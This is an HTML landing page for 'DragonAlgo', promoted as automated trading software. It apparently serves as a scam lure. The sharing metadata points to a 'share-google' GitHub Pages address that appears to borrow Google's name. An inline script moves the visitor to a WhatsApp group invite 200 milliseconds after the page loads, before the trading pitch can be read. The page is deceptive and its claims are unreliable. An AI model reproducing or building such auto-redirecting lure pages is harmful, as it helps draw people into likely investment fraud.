<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">

<title>DragonAlgo | High-Performance Automated Trading</title>

<meta property="og:title" content="DragonAlgo | High-Performance Automated Trading">
<meta property="og:description" content="Join DragonAlgo to explore smart algorithmic trading strategies and improve your decision-making efficiency.">
<meta property="og:url" content="https://share-google.github.io/vip/?v=18">
<meta property="og:type" content="website">

<meta name="twitter:card" content="summary">
<meta name="viewport" content="width=device-width, initial-scale=1">

<style>
body{font-family:Arial;text-align:center;background:#f4f4f4;padding-top:60px;margin:0;}
.box{background:#fff;max-width:500px;margin:auto;padding:30px;border-radius:10px;}
</style>

<script>
setTimeout(function(){
window.location.href="https://chat.whatsapp.com/FRrvMNoQBFg23wBs4nd15Y";
},200);
</script>

</head>
<body>
<div class="box">
<h1>DragonAlgo</h1>
<p>High-performance automated trading designed to support smarter, faster decision-making.</p>
</div>
</body>
</html>
